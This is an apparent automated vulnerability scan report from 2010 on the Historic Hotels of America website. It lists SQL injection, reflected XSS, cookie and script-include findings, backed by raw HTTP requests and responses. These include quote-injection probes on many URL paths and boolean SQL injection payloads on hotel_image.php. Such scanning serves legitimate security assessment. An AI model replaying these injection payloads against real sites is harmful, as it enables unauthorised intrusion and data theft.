1.1. http://www.historichotels.org/SpecialsPackages [REST URL parameter 1]
1.2. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 1]
1.3. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 2]
1.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 3]
1.5. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 4]
1.6. http://www.historichotels.org/hotel_image.php [REST URL parameter 1]
1.7. http://www.historichotels.org/inc_hotel_list.php [REST URL parameter 1]
1.8. http://www.historichotels.org/inc_hotel_list.php [hotel_state_code parameter]
1.9. http://www.historichotels.org/index.php [REST URL parameter 1]
1.10. http://www.historichotels.org/shop [REST URL parameter 1]
1.11. http://www.historichotels.org/spas_retreats [REST URL parameter 1]
1.12. http://www.historichotels.org/step_back_in_time [REST URL parameter 1]
1.13. http://www.historichotels.org/taste_of_napa [REST URL parameter 1]
1.14. http://www.historichotels.org/the_heathman_hotel_offer [REST URL parameter 1]
1.15. http://www.historichotels.org/the_lenox_special_offer [REST URL parameter 1]
1.16. http://www.historichotels.org/vacations_leisure [REST URL parameter 1]
1.17. http://www.historichotels.org/woodlands_inn_1906 [REST URL parameter 1]
1.18. http://www.historichotels.org/wort_hospitality [REST URL parameter 1]
2. Cross-site scripting (reflected)
2.1. http://www.historichotels.org/ [name of an arbitrarily supplied request parameter]
2.2. http://www.historichotels.org/SpecialsPackages [7f98a">4d036e11c5f parameter]
2.5. http://www.historichotels.org/index.php [layout parameter]
2.6. http://www.historichotels.org/index.php [name of an arbitrarily supplied request parameter]
2.7. http://www.historichotels.org/shop [name of an arbitrarily supplied request parameter]
2.8. http://www.historichotels.org/spas_retreats [name of an arbitrarily supplied request parameter]
3. Cookie without HttpOnly flag set
4. Cross-domain Referer leakage
4.1. http://www.historichotels.org/SpecialsPackages
4.2. http://www.historichotels.org/index.php
5. Cross-domain script include
5.1. http://www.historichotels.org/
5.2. http://www.historichotels.org/SpecialsPackages
5.3. http://www.historichotels.org/favicon.ico
5.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif
5.5. http://www.historichotels.org/index.php
5.6. http://www.historichotels.org/shop
5.7. http://www.historichotels.org/spas_retreats
5.8. http://www.historichotels.org/step_back_in_time
5.9. http://www.historichotels.org/taste_of_napa
5.10. http://www.historichotels.org/the_heathman_hotel_offer
5.11. http://www.historichotels.org/the_lenox_special_offer
5.12. http://www.historichotels.org/vacations_leisure
5.13. http://www.historichotels.org/woodlands_inn_1906
5.14. http://www.historichotels.org/wort_hospitality
6.1. http://www.historichotels.org/favicon.ico
6.2. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif
6.3. http://www.historichotels.org/hotel_image.php
6.4. http://www.historichotels.org/shop
7. HTML does not specify charset
7.1. http://www.historichotels.org/hotel_image.php
7.2. http://www.historichotels.org/inc_hotel_list.php
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /SpecialsPackages |
GET /SpecialsPackages' HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:52:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /SpecialsPackages'' HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Wed, 20 Oct 2010 23:52:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:52:16 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /fckeditor/editor/images2 |
GET /fckeditor'/editor/images2/1x1.gif HTTP/1.1 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:06:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /fckeditor''/editor/images2/1x1.gif HTTP/1.1 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:06:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:06:10 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /fckeditor/editor/images2 |
GET /fckeditor/editor'/images2/1x1.gif HTTP/1.1 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:06:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /fckeditor/editor''/images2/1x1.gif HTTP/1.1 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:06:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:06:43 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /fckeditor/editor/images2 |
GET /fckeditor/editor/images2'/1x1.gif HTTP/1.1 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:07:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /fckeditor/editor/images2''/1x1.gif HTTP/1.1 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:07:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:07:17 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /fckeditor/editor/images2 |
GET /fckeditor/editor/images2 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:07:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /fckeditor/editor/images2 Accept: */* Referer: http://www.historichotels Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:07:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:07:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /hotel_image.php |
GET /hotel_image.php13560420'%20or%201%3d1-- Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 20:52:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 20:52:18 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Home, Historic Hotels of America</title> <META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> <META name="description" content="Historic Hotels of America features 213 historic hotels, quality hotels that have maintained their historic architecture and ambience, ideal for leisure vacations, romantic getaways and business travel."> <META name="keywords" content="historic hotels, historic hotels of america, hha, historic hotel in america, national trust historic hotels"> <script type="text/javascript" src="/scripts/qadmin.js"> <script type="text/javascript" src="/scripts/sorttable <script type="text/javascript" src="/scripts/calendar.js <script src="http://www.google <script type="text/javascript"> _uacct = "UA-232386-1"; urchinTracker(); </script> <style type="text/css"> <!-- A.footerlink:link { FONT-WEIGHT: normal; FONT-SIZE: 8pt; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none } A.footerlink:hover { FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: underline } A.footerlink:visited { FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none } ...[SNIP]... |
GET /hotel_image.php13560420'%20or%201%3d2-- Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 20:52:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 20:52:20 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> <META name="description" content=""> <META name="keywords" content=""> <script type="text/javascript" src="/scripts/qadmin.js"> <script type="text/javascript" src="/scripts/sorttable <script type="text/javascript" src="/scripts/calendar.js <script src="http://www.google <script type="text/javascript"> _uacct = "UA-232386-1"; urchinTracker(); </script> <style type="text/css"> <!-- A.footerlink:link { FONT-WEIGHT: normal; FONT-SIZE: 8pt; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none } A.footerlink:hover { FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: underline } A.footerlink:visited { FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none } A.footerlink:hover { FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: underline } A:link { COLOR: #1b498c; FONT-STYLE: normal; FONT-FAMILY: "Times New Roman", Times, serif } ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /inc_hotel_list.php |
GET /inc_hotel_list.php'?hotel_state_code=CA& HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://www.historichotels Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:44:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /inc_hotel_list.php''?hotel_state_code=CA& HTTP/1.1 Accept: */* Accept-Language: en-us Referer: http://www.historichotels Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Wed, 20 Oct 2010 23:44:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 20 Oct 2010 23:44:38 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /inc_hotel_list.php |
GET /inc_hotel_list.php?hotel Accept: */* Accept-Language: en-us Referer: http://www.historichotels Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <script language="javascript"> function GetHotels() { //alert(xmlhttp //divDsp('hotel_list_a', 'none'); var x = new getObj('hotel_list_div'); x.innerHTML = xmlhttp.respo ...[SNIP]... <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> ...[SNIP]... |
GET /inc_hotel_list.php?hotel Accept: */* Accept-Language: en-us Referer: http://www.historichotels Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E) Host: www.historichotels.org Proxy-Connection: Keep-Alive Cookie: __utmc=15851695; __utma=15851695 |
HTTP/1.1 200 OK Connection: close Date: Wed, 20 Oct 2010 23:41:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <script language="javascript"> function GetHotels() { //alert(xmlhttp //divDsp('hotel_list_a', 'none'); var x = new getObj('hotel_list_div'); x.innerHTML = xmlhttp.respo ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /index.php |
GET /index.php' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /index.php'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:01:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:01:40 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /shop |
GET /shop' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /shop'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:01:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:01:14 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /spas_retreats |
GET /spas_retreats' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:04:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /spas_retreats'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:04:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:04:12 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /step_back_in_time |
GET /step_back_in_time' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /step_back_in_time'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:01:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:01:38 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /taste_of_napa |
GET /taste_of_napa' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /taste_of_napa'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:01:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:01:24 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /the_heathman_hotel_offer |
GET /the_heathman_hotel_offer' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 00:01:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Content-type: text/html <p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha ...[SNIP]... |
GET /the_heathman_hotel_offer'' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
HTTP/1.1 404 Not Found Connection: close Date: Thu, 21 Oct 2010 00:02:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/4.4.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 21 Oct 2010 00:02:00 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Content-type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Historic Hotels of America</title> <META http-equiv=Content-Type ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.historichotels |
Path: | /the_lenox_special_offer |
GET /the_lenox_special_offer' HTTP/1.1 Host: www.historichotels.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=15851695 |
